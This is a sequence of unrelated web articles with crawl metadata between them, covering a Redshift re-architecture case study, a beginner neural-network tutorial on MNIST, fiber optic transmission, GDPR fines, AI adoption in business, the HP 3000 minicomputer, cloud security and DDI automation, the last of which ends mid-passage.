The mLogica team began with a detailed analysis of the environment to review the Redshift design and architecture as well as the key processes and tools used to enable the functionality required of the system and establish the baseline issues impacting the stability of the environment. After a thorough analysis, mLogica was able to determine that the original design forced key processes were in constant contention with each other thereby causing the system to become unstable and crash. mLogica recommended modification of the processes, new configuration settings for the tools which were being used to support the key functional requirements, and a new deployment architecture more suited to support the requirements of the system and to achieve the performance goals outlined early in the engagement. A resolution plan for the existing issues was proposed to the Customer with mLogica providing a best practices and recommendations document along with a conceptual architecture diagram to improve the end-to-end data pipeline performance including DMS and Redshift service optimization.
The Customer accepted our recommendations and the new configuration deployed which allowed achieved the following results
- Predictability: Processes finished on time with no contention
- Stability: System uptime targets were achieved
- Scalability: The ability to scale up to meet peak demands was accomplished
mLogica implemented the recommended end state architecture for separate workloads between Aurora and Redshift; including directing the insert, delete, and update processing to Aurora; performing transformational processing at the DMS level (ETL) or at Aurora level (ELT) and using Redshift only for analytics.
After the new architecture was implemented, mLogica directed the users to Redshift based on their use cases. Batch processing was also directed accordingly. This eliminated user and processing restrictions.
This optimization enabled the Customer to separate development/quality assurance from the production instance for both Redshift and Aurora as part of the proposed end-state architecture. Additionally, high availability/disaster recovery was implemented and CloudWatch utilized to monitor various aspects of the Redshift cluster. These best practices enabled the Customer to define data residency requirements, since the final deployment will be global; review the compliance risks and create mitigation plans; and plan for data security risks – data privacy and GDPR regulations.
|
<urn:uuid:a09a6e95-ddf3-414d-b85b-0d8bd4218a54>
|
CC-MAIN-2022-40
|
https://wwwseo.mlogica.com/case-study-global-clothing-manufacturer-and-retailer-amazon-redshift-re-architecture/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00056.warc.gz
|
en
| 0.951188 | 953 | 2.578125 | 3 |
After presenting in two previous posts ( post 1, post 2) the factors that have contributed to unleashing the potential of Artificial Intelligence and related technologies as Deep Learning, now is time to start to review the basic concepts of neural networks.
In the same way that when you start programming in a new language there is a tradition of doing it with a Hello World print, in Deep Learning you start by creating a recognition model of handwritten numbers. Through this example, this post will present some basic concepts of neural networks, reducing theoretical concepts as much as possible, with the aim of offering the reader a global view of a specific case to facilitate the reading of the subsequent posts where different topics in the area will be dealt with in more detail.
Case of study: digit recognition
In this section, we introduce the data we will use for our first example of neural networks: the MNIST dataset, which contains images of handwritten digits.
The MNIST dataset, which can be downloaded from The MNIST databasepage, is made up of images of hand-made digits. This dataset contains 60,000 elements to train the model and 10,000 additional elements to test it, and it is ideal for entering pattern recognition techniques for the first time without having to spend much time preprocessing and formatting data, both very important and expensive steps in the analysis of data and of special complexity when working with images; this dataset only requires small changes that we will comment on below.
This dataset of black and white images has been normalized to 20×20 pixels while retaining their aspect ratio. In this case, it is important to note that the images contain gray levels as a result of the anti-aliasing technique, used in the normalization algorithm (reducing the resolution of all images to one of lower). Subsequently, the images were centered on a 28×28 pixel, calculating the center of mass of these and moving the image in order to position this point in the center of the 28×28 field. The images are of the following style:
Pixel images of handwritten texts ( From: MNIST For ML Beginners, tensorflow.org)
Furthermore, the dataset has a label for each of the images that indicates what digit it represents, being, therefore, a supervised learning which we will discuss in this chapter.
This input image is represented in a matrix with the intensities of each of the 28×28 pixels with values between [0, 255]. For example, this image (the eighth of the training set)
It is represented with this matrix of 28×28 points (the reader can check it in the notebook of this chapter):
On the other hand, remember that we have the labels, which in our case are numbers between 0 and 9 that indicate which digit the image represents, that is, to which class it is associated. In this example, we will represent each label with a vector of 10 positions, where the position corresponding to the digit that represents the image contains a 1 and the rest contains 0s. This process of transforming the labels into a vector of as many zeros as the number of different labels, and putting a 1 in the index corresponding to the label, is known as one-hot encoding.
Before moving forward, a brief intuitive explanation of how a single neuron works to fulfill its purpose of learning from the training dataset can be helpful for the reader. Let’s look at a very simple example to illustrate how an artificial neuron can learn.
Based on what has been explained in the previous chapter, let us make a brief reminder about classic Machine Learning regression and classification algorithms since they are the starting point of our Deep Learning explanations.
We could say that regression algorithms model the relationship between different input variables (features) using a measure of error, the loss, which will be minimized in an iterative process in order to make predictions “as accurate as possible”. We will talk about two types: logistic regression and linear regression.
The main difference between logistic and linear regression is in the type of output of the models; when our output is discrete, we talk about logistic regression, and when the output is continuous we talk about linear regression.
Following the definitions introduced in the first chapter, logistic regression is an algorithm with supervised learning and is used to classify. The example that we will use next, which consists of identifying which class each input example belongs to by assigning a discrete value of type 0 or 1, is a binary classification.
A plain artificial neuron
In order to show how a basic neuronal is, let’s suppose a simple example where we have a set of points in a two-dimensional plane and each point is already labeled “square” or “circle”:
Given a new point “X“, we want to know what label corresponds to it:
A common approach is to draw a line that separates the two groups and use this line as a classifier:
In this case, the input data will be represented by vectors of the form (x1, x2) that indicate their coordinates in this two-dimensional space, and our function will return ‘0’ or ‘1’ (above or below the line) to know if it should be classified as “square” or “circle”. As we have seen, it is a case of linear regression, where “the line” (the classifier) following the notation presented in chapter 1 can be defined by:
More generally, we can express the line as:
To classify input elements X, which in our case are two-dimensional, we must learn a vector of weight W of the same dimension as the input vectors, that is, the vector (w1, w2) and a b bias.
With these calculated values, we can now construct an artificial neuron to classify a new element X. Basically, the neuron applies this vector W of calculated weights on the values in each dimension of the input element X, and at the end adds the bias b. The result of this will be passed through a non-linear “activation” function to produce a result of ‘0’ or ‘1’. The function of this artificial neuron that we have just defined can be expressed in a more formal way such as:
Now, we will need a function that applies a transformation to variable z so that it becomes ‘0’ or ‘1’. Although there are several functions (which we will call “activation functions” as we will see in chapter 4), for this example we will use one known as a sigmoid function that returns an actual output value between 0 and 1 for any input value:
If we analyze the previous formula, we can see that it always tends to give values close to 0 or 1. If the input z is reasonably large and positive, “e” at minus z is zero and, therefore, the y takes the value of 1. If z has a large and negative value, it turns out that for “e” raised to a large positive number, the denominator of the formula will turn out to be a large number and therefore the value of y will be close to 0. Graphically, the sigmoid function presents this form:
So far we have presented how to define an artificial neuron, the simplest architecture that a neural network can have. In particular this architecture is named in the literature of the subject as Perceptron (also called linear threshold unit (LTU)), invented in 1957 by Frank Rosenblatt, and visually summarized in a general way with the following scheme:
Finally, let me help the reader to intuit how this neuron can learn the weights W and the biases b from the input data that we already have labeled as “squares” or “circles” (in chapter 4 we will present how this process is done in a more formal way).
It is an iterative process for all the known labeled input examples, comparing the value of its label estimated through the model, with the expected value of the label of each element. After each iteration, the parameter values are adjusted in such a way that the error obtained is getting smaller as we keep on iterating with the goal of minimizing the loss function mentioned above. The following scheme wants to visually summarize the learning process of one perceptron in a general way:
But before moving forward with the example, we will briefly introduce the form that neural networks usually take when they are constructed from perceptrons like the one we have just presented.
In the literature of the area we refer to a Multi-Layer Perceptron (MLP) when we find neural networks that have an input layer, one or more layers composed of perceptrons, called hidden layers and a final layer with several perceptrons called the output layer. In general we refer to Deep Learning when the model based on neural networks is composed of multiple hidden layers. Visually it can be presented with the following scheme:
MLPs are often used for classification, and specifically when classes are exclusive, as in the case of the classification of digit images (in classes from 0 to 9). In this case, the output layer returns the probability of belonging to each one of the classes, thanks to a function called softmax. Visually we could represent it in the following way:
As we will present in chapter 4, there are several activation functions in addition to the sigmoid, each with different properties. One of them is the one we just mentioned, the softmax activation function, which will be useful to present an example of a simple neural network to classify in more than two classes. For the moment we can consider the softmax function as a generalization of the sigmoid function that allows us to classify more than two classes.
Softmax activation function
We will solve the problem in a way that, given an input image, we will obtain the probabilities that it is each of the 10 possible digits. In this way, we will have a model that, for example, could predict a nine in an image, but only being sure in 80% that it is a nine. Due to the stroke of the bottom of the number in this image, it seems that it could become an eight in a 5% chance and it could even give a certain probability to any other number. Although in this particular case we will consider that the prediction of our model is a nine since it is the one with the highest probability, this approach of using a probability distribution can give us a better idea of how confident we are of our prediction. This is good in this case, where the numbers are made by hand, and surely in many of them, we cannot recognize the digits with 100% certainty.
Therefore, for this example of MNIST classification we will obtain, for each input example, an output vector with the probability distribution over a set of mutually exclusive labels. That is, a vector of 10 probabilities each corresponding to a digit and also the sum of all these 10 probabilities results in the value of 1 (the probabilities will be expressed between 0 and 1).
As we have already advanced, this is achieved through the use of an output layer in our neural network with the softmax activation function, in which each neuron in this softmax layer depends on the outputs of all the other neurons in the layer, since that the sum of the output of all of them must be 1.
But how does the softmax activation function work? The softmax function is based on calculating “the evidence” that a certain image belongs to a particular class and then these evidences are converted into probabilities that it belongs to each of the possible classes.
An approach to measure the evidence that a certain image belongs to a particular class is to make a weighted sum of the evidence of belonging to each of its pixels to that class. To explain the idea I will use a visual example.
Let’s suppose that we already have the model learned for the number zero (we will see later how these models are learned). For the moment, we can consider a model as “something” that contains information to know if a number is of a certain class. In this case, for the number zero, suppose we have a model like the one presented below:
Source: Tensorflow tutorial)
In this case, with a matrix of 28×28 pixels, where the pixels in red (in the white/black edition of the book is the lightest gray) represent negative weights (i.e., reduce the evidence that it belongs), while that the pixels in blue (in the black/white edition of the book is the darkest gray) represent positive weights (the evidence of which is greater increases). The black color represents the neutral value.
Let’s imagine that we trace a zero over it. In general, the trace of our zero would fall on the blue zone (remember that we are talking about images that have been normalized to 20×20 pixels and later centered on a 28×28 image). It is quite evident that if our stroke goes over the red zone, it is most likely that we are not writing a zero; therefore, using a metric based on adding if we pass through the blue zone and subtracting if we pass through the red zone seems reasonable.
To confirm that it is a good metric, let’s imagine now that we draw a three; it is clear that the red zone of the center of the previous model that we used for the zero will penalize the aforementioned metric since, as we can see in the left part of this figure, when writing a three we pass over:
Source: Tensorflow tutorial)
But on the other hand, if the reference model is the one corresponding to number 3 as shown in the right part of the previous figure, we can see that, in general, the different possible traces that represent a three are mostly maintained in the blue zone.
I hope that the reader, seeing this visual example, already intuits how the approximation of the weights indicated above allows us to estimate what number it is.
Source: Tensorflow tutorial)
The previous figure shows the weights of a concrete model example learned for each of these ten MNIST classes. Remember that we have chosen red (lighter gray in black and white book edition) in this visual representation for negative weights, while we will use blue to represent positives.
Once the evidence of belonging to each of the 10 classes has been calculated, these must be converted into probabilities whose sum of all their components add 1. For this, softmax uses the exponential value of the calculated evidence and then normalizes them so that the sum equates to one, forming a probability distribution. The probability of belonging to class i is:
Intuitively, the effect obtained with the use of exponentials is that one more unit of evidence has a multiplier effect and one unit less has the inverse effect. The interesting thing about this function is that a good prediction will have a single entry in the vector with a value close to 1, while the remaining entries will be close to 0. In a weak prediction, there will be several possible labels, which will have more or less the same probability.
The MNIST database of handwritten digits. [en línea]. Available at: http://yann.lecun.com/exdb/mnist [Consulta: 24/02/2017].
Wikipedia, (2016). Antialiasing [en línea]. Available at: https://es.wikipedia.org/wiki/Antialiasing [Visited: 9/01/2016].
Wikipedia, (2018). Sigmoid function [en línea]. Available at: https://en.wikipedia.org/wiki/Sigmoid_function [Visited: 2/03/2018].
Wikipedia (2018). Perceptron [en línea]. Available at https://en.wikipedia.org/wiki/Perceptron [Visited 22/12/2018]
Wikipedia, (2018). Softmax function [en línea]. Available at: https://en.wikipedia.org/wiki/Softmax_function [Visited: 22/02/2018].
TensorFlow, (2016) Tutorial MNIST beginners. [en línea]. Available at: https://www.tensorflow.org/versions/r0.12/tutorials/mnist/beginners/[Visited: 16/02/2018].
|
<urn:uuid:e09f9d29-05b3-4a34-aa8f-059074bd5e03>
|
CC-MAIN-2022-40
|
https://resources.experfy.com/ai-ml/neural-networks-basic-concepts-for-beginners/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00056.warc.gz
|
en
| 0.916216 | 3,457 | 3.59375 | 4 |
Advantages and Disadvantages of Fiber Optic Transmission in Telecommunications
May 21, 2019
The popularity of fiber optic transmission continues to increase within telecommunication networks around the world, driven by the rise in the demand for higher bandwidth and faster connectivity.
This blog explores the advantages and disadvantages of fiber in telecommunication networks.
Fiber Optic Transmission
Fiber optic communication systems often consist of three main parts. They are: an optical transmitter, cable and an optical receiver.
An optical transmitter converts electrical signals into optical signals. The devices used to transmit optical signals are often LED’s (light-emitting diodes) or laser diodes.
Fiber Optic Cables
The fiber optic cabling carries the optical signal (in the form of light), from the transmitter to the receiver.
There are a huge range of optical cables available and their use varies depending on the application required.
The optical receiver reconverts the optical signal back into an electrical signal. They key part of most optical receivers is the photodetector.
Advantages of Fiber Optic Transmission
There are a number of advantages for using fiber optic transmission systems:
No other cable-based transmission medium is can offer the same bandwidth that fiber does. In comparison to copper cabling for example, the volume of data that can be transmitted is far greater with fiber.
Fiber transmission is capable of transmitting with much less power loss across larger distances.
In comparison to other mediums, fiber is extremely resistant to inevitable external electromagnetic interference, which means it has a very low rate of bit error.
With data security concerns currently rife in telecommunications, fiber transmission offers a level of increased security that cannot be matched by other materials. This is because there is not way of ‘listening in’ to electromagnetic energy that “leaks” from the cable.
Disadvantages of Fiber Optic Transmission
Although there are substantially more advantages than disadvantages in the use of fiber optical transmission, the disadvantages shouldn’t be ignored.
Splicing fiber optic cabling is not easy and if they are bent or manipulated in shape too much they will break. They are highly susceptible to being cut or damaged during installation or through construction activity.
Fiber optic cable is made of glass, which is more fragile than electrical wires such as copper cabling. Not only that, but glass can be damaged by chemicals such as hydrogen gas that can affect transmission. Particular care has to be taken with laying undersea fiber cabling because of its fragility.
Attenuation and Dispersion
With long distance transmission, light will attenuate and disperse, which means additional components such as EDFA (Erbium-doped fiber amplifier – an optical repeater device that is used to boost the intensity of optical signals being carried through a fiber optic communications system) are required.
Cost to produce fiber cabling is higher than that of copper
Due to its efficiency and capacity, fiber optic transmission is being widely used and continues to be adopted for data transmission in place of metal wires. Traditional materials such as copper twisted-pair cabling or coaxial cabling is being steadily replaced by modern fiber optic options and as the dmand for more speed and greater bandwidth continues to increase fiber optics will continue to be deployed in future telecommunication networks.
Get all of our latest news sent to your inbox each month.
|
<urn:uuid:b21469e9-c650-4ef7-87a7-63412ac6a8e6>
|
CC-MAIN-2022-40
|
https://www.carritech.com/news/advantages-disadvantages-fiber-optic-cabling/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00056.warc.gz
|
en
| 0.92692 | 724 | 3.0625 | 3 |
Learn what you need to know about GDPR fines, as it is one of the most talked-about aspects of the GDPR. Below is a short explanation of what triggers the GDPR fines and who awards them. This article will also discuss what you can do to mitigate the amount.
Reading time: 2 minutes.
Administrative fines are one of the sanctions if data is mistreated under GDPR. Sanctions are triggered when an organization violates the GDPR. There are higher and lower levels to these fines. Whether a supervisory authority award an organization a high or low fine depends on a variety of factors, namely the severity of the violation and the actions taken by the organization.
The highest possible fines
GDPR fines for lesser infringements may reach up to 10,000,000 EUR or up to 2% of the total worldwide annual turnover, whichever that is highest. Likewise, fines for greater infringements may reach up to 20,000,000 EUR or up to 4% of the total worldwide annual turnover, whichever that is highest.
There are a variety of different reasons that can trigger lower-level fines. For example, the non-performance of a DPIA when needed, not keeping records of processing activities or failing to maintain proper IT-security.
In need of GDPR-support from a law firm?
Get support to prepare you and your business for an audit from the DPA.
Read more about the business law firm Sharp Cookie Advisors
Similarly, as with the lower level of fines, there are many reasons that can trigger the high fines. For instance, include violating the basic principles for processing, violating data subject’s rights or non-compliance with the supervisory authority’s orders.
What determines the size of GDPR fines?
The size of the fines detailed above is the highest amount possible. It’s the supervisory authority that decides the size of a fine. The supervisory authority’s goal is an effective and proportionate fine. GDPR details specific factors if a violation should result in a fine and the supervisory authority makes its assessment based on this.
The main factor is the gravity of the infringement. The authority may also consider previous infringements, how the violation was discovered and how co-operative an organisation acts in en enforcement action.
For a practical example on how a Supervisory Authority can reason when determining a fine, see our article on the Swedish Supervisory Authority’s first fine regarding use of facial recognition in school.
How can we prevent GDPR fines?
The only safe way to prevent GDPR fines is to be GDPR compliant. You achieve this by working toward fostering a good privacy culture in your company and maintaining the appropriate processes. This includes drafting proper privacy policies, informing data subjects, training your employees and continuously improving the organisation.
Even if your organisation is not GDPR compliant, but is working toward this goal, it is a mitigating factor. This means that even if you get fined, the supervisory authority will take into account you are looking to improve. For more information regarding how to be prepared for an inspection by a supervisory authority, see our article Audit Powers of the Data Protection Authority: How to Prepare.
|
<urn:uuid:0bf889ef-eba5-4ebb-b7f3-66f7a18851d0>
|
CC-MAIN-2022-40
|
https://www.gdprsummary.com/what-you-need-to-know-about-gdpr-fines/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00056.warc.gz
|
en
| 0.913464 | 660 | 2.640625 | 3 |
Embedding AI in everything. Why we can't do without it now.
In 1997, Deep Blue beat then reigning chess champion, Gary Kasprov. In 2011, Watson beat then reigning Jeopardy champion, Ken Jennings. In 2016, Alphago beat then reigning Go champion, Lee Sedol. It is not surprising to see why AI is on top of everyone’s mind. With Digital Assistants (Siri, Alexa, Google Home, Cortana), chat bots, self-driving cars, face passwords, algorithmic trading, personalized news feeds, personalized product and movie recommendations and for the techno-geeks Eugene Goostman who arguably passed the Turing test–it appears that Artificial Intelligence is about to replace humans. The thought does have merit and is well grounded. AI does really well on countless highly specific use cases. That said, we are very far away from building a general purpose AI engine (similar to that of a human’s ability).
Broadly speaking AI (and associated automation) gets us economies of scale. If there is a well-defined (and repetitive) task, it can likely be automated. While one could build a system to beat Ken Jennings, one cannot take the same system to play Go. One would have to build a totally different system. Humans, on the other hand, get us economies of scope. As humans, we can do a variety of tasks, learn on the fly, process on the go and have access to a seemingly infinite memory. As you are reading this article, you probably are multi-tasking, processing information, jogging your memory while associating words, phrases, contexts and scenes from movies.
Although AI is ubiquitous only now, it was founded as an academic discipline and as a branch of Computer Science, 61 years back, in 1956.Though related, AI methods differ from traditional machine learning (ML) methods. Traditional ML methods generally include Supervised- and Un-supervised learning, Dimensionality Reduction, Anomaly Detection and Non-linear Learning.AI use cases include image recognition (facial passwords on iPhone X), reasoning (medical diagnosis), building knowledge banks(Watson), working with speech and natural language constructs of processing, generation and translations(Digital Assistants). In both realms, the list is not nearly exhaustive, but is illustrative.
Today, if there is one thing there is no dearth of, it is data. It is now, not about getting access to data, but being able to manage it and use it well. Firms that have embedded data and algorithms (ML and AI) into everyday decision making have enjoyed sustained Cumulative Average Growth Rate (CAGR) of 7-12 percent over 1.3 decades starting in 2001. Their CAGRs handily beat respective industry averages of 1-5 percent. If a firm is not thinking along these lines, it may be leaving a lot of money on the table and might suffer from an obsolescence risk. A few thoughts and actions can help a firm along this journey.
Establishing a baseline and making incremental improvements will help a firm solve the right problems well as opposed to solving any problem.
First: The barrier to entry to embedding AI is lower than you might think: While building AI applications seems so far out and complex, analytics shops more or less have an instant access to data, large amounts of compute (potentially in the cloud) and abilities (in the form of open source packages). Some freely available and highly used packages are from Google (Tensorflow), H20.ai, Scikit-learn etc. There are a lot of commercially available packages as well. It is not a stretch for a traditional analytics shop to start learning and implementing these (seemingly) new methods. The costs to getting started are rather low. To get good at them, a conscious investment is paramount.
Second: Start with an existing process that can benefit from augmenting with data and algorithms: There are several areas that might fit these criteria. One potential area is along the lines of managing a customer value chain. Take a firm in the life insurance industry as an example.
In the prospecting realm, instead of running a traditional spray and pray marketing campaign, it is much more cost effective to be targeted. By building and leveraging propensity models (to respond, to apply and to qualify) one could potentially reduce campaign costs by a half or a third.
In the acquisition realm, consumers generally say that they prefer lower prices, but when we observe their actions closely, they typically overweigh convenience over price. By building interfaces that make it convenient to submit applications (bots & web-apps), automatically request necessary evidences (triage),flag potential misrepresentation (fraud detection), underwrite (risk classification) and manage the buying process seamlessly, the drop-out of consumers from the traditional marketing funnel (of awareness, consideration and purchase) will likely be low. Absence of such a process, a firm might risk feeding harnessed leads to its competition.
In the nurture realm, with the advent of telematics, activity and bio-metric trackers are becoming ubiquitous. Data from these devices can be very helpful in both understanding customer behaviors and their needs. Sophisticated algorithms can then help with bubbling up insights, crafting nudge-recommendations to further enrich the customer experience, and improve stickiness thus likely improving profitability.
Third: Overweigh sophistication of implementation over sophistication of algorithms: Establishing a baseline and making incremental improvements will help a firm solve the right problems well as opposed to solving any problem. Such a construct will also help with quantifying the value that investments in AI and Analytics practices bring to the table while giving tangible and challenging goals to analytics professionals.
In a nutshell, AI and Analytics can be embedded into a lot of areas in everyday decision making. Doing so can help a firm further its customer-centricity goals and likely improve profitability. Late adopters might face an obsolescence risk and will likely have to work harder to preserve their best-customer mix.
|
<urn:uuid:7aca2d15-786c-44fa-b286-27e4d59492ff>
|
CC-MAIN-2022-40
|
https://artificial-intelligence.cioreview.com/cxoinsight/embedding-ai-in-everything-why-we-cant-do-without-it-now-nid-25063-cid-175.html
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00056.warc.gz
|
en
| 0.941813 | 1,238 | 2.9375 | 3 |
Exploring Aspects of Human Error in Cybersecurity
Organizations rely heavily on secure networks, hardware and software to protect their data from attacks, but many may not realize their biggest risk is actually their untrained employees. Studies show that 88% of data breach incidents are caused by mistakes employees make. Human errors can have widespread effects on your organization and result in significant financial loss when data falls into the wrong hands. Cybersecurity awareness is an integral component in keeping organizations secure, yet awareness training is something that many lack.
|
<urn:uuid:43ad550b-cc79-459b-917a-81f77a2bffe2>
|
CC-MAIN-2022-40
|
https://globallearningsystems.com/webinars/employee-mistakes/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00056.warc.gz
|
en
| 0.964473 | 109 | 2.671875 | 3 |
The federal government had been using computers for decades by the late 1970s, and IBM’s mainframes had helped power NASA astronauts to the moon. But there weren’t many minicomputers or early personal computers being used in federal offices.
The number of computers in use in the federal government rose from about 2,400 in 1965 to a little more than 11,000 in 1977, according to figures from the General Services Administration and compiled in 1979 by the National Bureau of Standards (which later became the National Institute of Standards and Technology).
In a sign of the changing times, the White House finally got a computer during the presidency of Jimmy Carter. According to the White House Historical Association, the Carter administration in 1978 “began the task of automating the White House with computers.”
As the Computer History Museum notes, “while the U.S. government had funded many computing projects dating back to the 1940s, it wasn't until the Carter administration that a computer is actually installed in the White House. Staffers were given terminals to access a shared Hewlett-Packard HP3000 computer, and the technology department acquired a Xerox Alto for the Oval Office.”
Initial uses of the Hewlett-Packard 3000 included “assembling databases, tracking correspondence, developing a press release system, and compiling issues and concerns of Congress,” according to the White House Historical Association.
WHAT Is the HP 3000?
Photo credit: HP Computer Museum
Hewlett-Packard started developing the HP 3000 in 1968, and it was HP’s first minicomputer focused on the commercial data processing market, according to Becoming Hewlett Packard: Why Strategic Leadership Matters, by Robert Burgelman, Webb McKinney and Philip Meza. The authors note that the HP 3000 was a “versatile minicomputer” that “performed broader general-purpose computations than its rivals.”
The HP 3000 was a 16-bit business minicomputer, according to Managing Multivendor Networks, by John Enck and Dan Blacharski. As HP Computer Museum notes, instead of using the RTE or DOS operating systems, the machine ran on a custom OS known as Multi-Programming Executive, which would last for about 25 years.
As Enck and Blacharski detail, the HP 3000 was not “designed to run special interfaces or highly complex, concurrent hardware activities.” Instead, the machine was designed to “accommodate concurrent users working at administrative and business applications.” Each user had a session environment from which he or she worked independently of other users, they add. That made it ideal for settings like the White House, in which multiple staffers could use the machines to work on separate tasks.
WHEN Was the HP 3000 Introduced?
Photo credit: ed-thelen.org/Wikimedia Commons
The HP 3000 was first introduced in 1972, but it got off to a rocky start. Burgelman, McKinney and Meza write that it had a “very unsuccessful launch.” The system “bogged down badly” and “four users could bring it to its knees,” according to The HP Phenomenon: Innovation and Business Transformation, by Charles House and Raymond Price.
HP executives Paul Ely and Ed McCracken set out to fix the issues. McCracken discovered that the computer’s software was not the cause of customer problems, but rather that the manufacturing of the machines was “uncharacteristically slipshod,” they added.
However, Burgelman, McKinney and Meza write that, after the problems had been worked out, the HP 3000 “found success in the commercial data processing market.” Indeed, the computer was still going strong into the early 1990s. A November 1992 Computerworld “Buyer’s Guide” user survey gave the HP 3000 a highest user satisfaction rating.
WHY Did the HP 3000 Die Off?
Photo credit: HP Computer Museum
The HP 3000, like many minicomputers of its era, was eventually supplanted by newer, faster and more capable machines, and by the widespread adoption of PCs in the late 1980s and early ’90s.
Indeed, the White House Historical Association notes that “President Ronald Reagan’s staff expanded the uses of computer office technology,” and soon adopted word processors with the advent of PCs in the 1980s.
Reagan had the Carter administration’s Xerox Alto removed from the Oval Office after he was elected, according to the Computer History Museum. No president since Carter has had a dedicated computer in the Oval Office, according to Slate.
Slate noted after former President Barack Obama was sworn in: “The president has a fleet of computer-equipped staffers sitting directly outside his office doors. President Bush sometimes used the computers of these personal aides to check news reports or sports scores. (He also had a personal computer at his Crawford ranch, which he used for limited personal surfing.)”
By the end of 1976, the HP 3000 line alone was producing close to $50 million in revenue, House and Price write (equivalent to $214 million today).
"This Old Tech" is an ongoing series about technologies of the past that had an impact. Have an idea for a technology we should feature? Please let us know in the comments!
|
<urn:uuid:e3730bcd-fcdc-46b2-b19a-eb4a44fe3032>
|
CC-MAIN-2022-40
|
https://fedtechmagazine.com/article/2017/05/hp-3000-made-history-first-computer-white-house
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00056.warc.gz
|
en
| 0.961645 | 1,126 | 3.078125 | 3 |
Why the Cloud Is As Secure
Recently, a great portion of hype in the technology sector is related to cloud computing security and reliability. Recent service interruptions experienced by leading cloud services providers like Amazon, in combination with security issues and credential leaks that occurred in services delivered by Sony and Google’s Android operating systems raised questions about the overall security and safety of cloud-based solutions.
There is no simple or straightforward answer to the question whether the Cloud is a secure place for storing data, conducting transactions and maintaining corporate databases. Moreover, one should distinguish between private, public and hybrid clouds used to store corporate data run business applications. Most security experts agree that cloud-based solutions are as secure as offline software and storage products and services that run in a corporate environment, on a corporate server and are isolated from external networks.
Actually, a private cloud i.e. most clouds deployed by enterprises, small and large ones alike, can experience downtime as often as public clouds like those offered by Google and Amazon, for example. Private, public and hybrid clouds utilize infrastructure, hardware and software that is similar to the ones used in corporate private networks; therefore, IT specialists face the same problems in a “traditional” and a cloud environment. Over 200,000 Google’s Gmail users saw their email accounts emptied in a day, loosing emails and other documentation they archived for years. However, corporate users could experience the same troubles should a company server crash, deleting data stored in their corporate email accounts. No one is insured against hardware faults and Google later admitted that the mysterious loss of data occurred due to a combination of hardware and software faults.
The human factor should not be underestimated, too.
Government agencies around the world avoid using cloud services offered by corporate providers because of the risks related to Data leaks and data protection in the Cloud. Actually, most reputable providers of cloud services apply strict data and software access policies similar to those implemented by Government bodies. On the other hand, data leaks within the government-run companies and agencies occur more frequently than information leaks originating from corporations. If an American sergeant managed to transfer sources to Wikileaks, thousands of classified government cables stored within the U.S. Army computer networks, one should bet that the same can happen to myriads of files and emails stored in public cloud services. The greatest danger is related to targeted attacks and business espionage while individual users should beware mostly of identity theft.
Reliability of cloud services is another issue that should be taken into account. A growing number of providers offer cloud services and products while Software-as-a-Service (SaaS) and Platform-as-a-Service (PaaS) are now commonly used to reduce corporate costs. Other enterprises rely on Infrastructure-as-a-Service to run their business but in all these scenarios business depends on external resources to run smoothly their everyday operations.
Thus, reliability of cloud products and services is now a major issue while many IT specialists admit they are not convinced in the reliability of cloud solutions deployed within their respective organizations. For example, an enterprise greatly reduces its software licensing fees and payroll costs by deploying a cloud software platform but such a solution can cost dearly if the PaaS provider does not offer an acceptable reaction time in case of malfunctions and service faults.
Once again, the same troubles can occur in a “traditional” software environment where a platform is not supported in an appropriate manner or a company lacks experienced IT staff. Connection and processing speed is also a concern when the issue in hand is cloud computing but this can be subject to a separate article.
In reality, the Cloud is as secure and safe as is a personal computer connected to a closed corporate network, provided that the network is maintained by well-trained specialists and all available and applicable security and safety measures are implemented. No complete security is available in an interconnected environment where practically all devices and gadgets are able to connect to a sort of network.
Apart from imperfections offered by software and hardware, the human factor is still the main threat to security and safety in the Cloud.
By Kiril Kirilov
Kiril V. Kirilov is a content strategist and writer who is analyzing the intersection of business and IT for nearly two decades. Some of the topics he covers include SaaS, cloud computing, artificial intelligence, machine learning, IT startup funding, autonomous vehicles and all things technology. He is also an author of a book about the future of AI and Big Data in marketing.
|
<urn:uuid:7294d2d3-d5b1-4233-b54c-d950e1a00e26>
|
CC-MAIN-2022-40
|
https://cloudtweaks.com/2011/05/why-the-cloud-is-as-secure-as-your-pc/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00257.warc.gz
|
en
| 0.944761 | 913 | 2.59375 | 3 |
You are convinced about the interest of the Infrastructure As Code approach. But you don’t really know how to take best advantage of the code that will be produced. The principles used in software architecture and known as the abstraction layer can be applied to infrastructure. This layer will hide the complexity of the infrastructure and allow other functional programs to manage infrastructure components through high-level API services.
In the context of building such an abstraction layer with automation capabilities for the infrastructure, the DDI (DNS, DHCP, IPAM) solution should be one of the first to plug to and consume data from. DDI is well known to be the central repository for all network-related information, so has the ability to help most network’s services through automation. DDI can offer both the information and the repository to store these, as well as enhancements through metadata addition. But DDI is also a great automation tool that has excellent knowledge of what happens on the IP network. These valuable events can therefore be shared, almost in real-time, with all other interested solutions.
DDI in the Abstraction Layer
Starting an automation abstraction layer allows you to think about how to present the infrastructure to consumers via the northbound-exposed set of APIs. Do we really care about what a subnet is, or is it better to think about a network with capabilities and associated with IP addressing? Just take a look at how big public cloud players have built their abstraction layer to get some good ideas on how to proceed.
